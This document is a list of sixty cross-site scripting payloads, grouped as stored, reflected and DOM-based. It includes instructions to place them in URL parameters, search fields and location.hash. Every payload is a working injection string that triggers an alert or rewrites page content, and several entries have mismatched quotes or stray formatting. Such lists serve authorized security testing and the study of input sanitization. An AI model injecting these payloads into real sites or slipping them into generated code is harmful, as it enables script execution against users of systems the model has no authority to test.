## **20 Custom Stored XSS Payloads**

- 1. <script>alert('StoredXSS-1')</script>
- 2. "><script>alert('StoredXSS-2')</script>
- 3. <img src=x onerror=alert('StoredXSS-3')>
- 4. <svg/onload=alert('StoredXSS-4')>
- 5. <iframe src="javascript:alert('StoredXSS-5')"></iframe>
- 6. <body onload=alert('StoredXSS-6')>
- 7. <audio src onerror=alert('StoredXSS-7')></audio>
- 8. <video><source onerror="alert('StoredXSS-8')"></video>
- 9. <input autofocus onfocus=alert('StoredXSS-9')>
- 10. <details open ontoggle=alert('StoredXSS-10')>Click me</details>
- 11. <math><mi xlink:href="data:x,alert('StoredXSS-11')" /></math>
- 12. <img src="x" onerror="document.body.innerHTML='StoredXSS-12"'>
- 13. <script>document.write('<iframe src=javascript:alert("StoredXSS-13")>')</script>
- 14. <div style="animation-name:x" onanimationstart="alert('StoredXSS-14')"></div>
- 15. <marquee onstart=alert('StoredXSS-15')>Hello</marquee>
- 16. <form onsubmit=alert('StoredXSS-16')><input type=submit></form>
- 17. <object data="javascript:alert('StoredXSS-17')"></object>
- 18. <embed src="javascript:alert('StoredXSS-18')">
- 19. <script>window['al'+'ert']('StoredXSS-19')</script>
- 20. <img src="javascript:alert('StoredXSS-20')">

## 20 Custom Reflected XSS Payloads

Use these in **URL parameters** or reflected inputs (like search, login errors, etc.):

- 1. ?q=<script>alert('Reflected-1')</script>
- 2. ?search="><svg/onload=alert('Reflected-2')>
- 3. ?xss=<img src=x onerror=alert('Reflected-3')>
- 4. ?term=<body onload=alert('Reflected-4')>
- 5. ?v=<iframe src="javascript:alert('Reflected-5')"></iframe>
- 6. ?xss=';alert('Reflected-6');//
- 7. ?msg=<details open ontoggle=alert('Reflected-7')>Click</details>
- 8. ?search=<script>confirm('Reflected-8')</script>

- 9. ?q=<object data="javascript:alert('Reflected-9')"></object>
- 10. ?name=<audio src onerror=alert('Reflected-10')>
- 11. ?user=<video><source onerror="alert('Reflected-11')"></video>
- 12. ?error=<img src="x" onerror="document.body.innerHTML='Reflected-12"">
- $13. \\ ?input=<svg><desc><![CDATA[<script>alert('Reflected-13')</script>]]></desc></svg>$
- 14. ?test=<input onfocus=alert('Reflected-14') autofocus>
- 15. ?user=<form onsubmit=alert('Reflected-15')><input type=submit></form>
- 16. ?q=<math><mi xlink:href="data:x,alert('Reflected-16')" /></math>
- 17. ?search=<img src="javascript:alert('Reflected-17')">
- 18. ?lang=en"><script>alert('Reflected-18')</script>
- 19. ?debug=<marquee onstart=alert('Reflected-19')>Hi</marquee>
- 20. ?query=<script>window['al'+'ert']('Reflected-20')</script>

## 20 Custom DOM-Based XSS Payloads

Use in input that's handled by JavaScript (innerHTML, location.hash, document.write, etc.):

- 1. #<script>alert('DOM-1')</script>
- 2. #"><img src=x onerror=alert('DOM-2')>
- 3. #test"><svg/onload=alert('DOM-3')>
- 4. #xss=<iframe src="javascript:alert('DOM-4')"></iframe>
- 5. #<body onload=alert('DOM-5')>
- 6. #<details open ontoggle=alert('DOM-6')>
- 7. #<audio src onerror=alert('DOM-7')>
- 8. #<video><source onerror="alert('DOM-8')"></video>
- 9. #<input autofocus onfocus=alert('DOM-9')>
- 10. #<form onsubmit=alert('DOM-10')><input type=submit></form>
- 11. #<script>confirm('DOM-11')</script>
- 12. #"><math><mi xlink:href="data:x,alert('DOM-12')" /></math>
- 13. #<img src="javascript:alert('DOM-13')">
- 14. #<script>document.write('<iframe src=javascript:alert("DOM-14")>')</script>
- 15. #<div style="animation-name:x" onanimationstart="alert('DOM-15')"></div>
- 16. #"><marquee onstart=alert('DOM-16')>Hi</marquee>

- 17. #<script>window.location='javascript:alert("DOM-17")'</script>
- 18. #<img src onerror=document.body.innerHTML='DOM-18'>
- 19. #<script>window['al'+'ert']('DOM-19')</script>
- 20. #<object data="javascript:alert('DOM-20')"></object>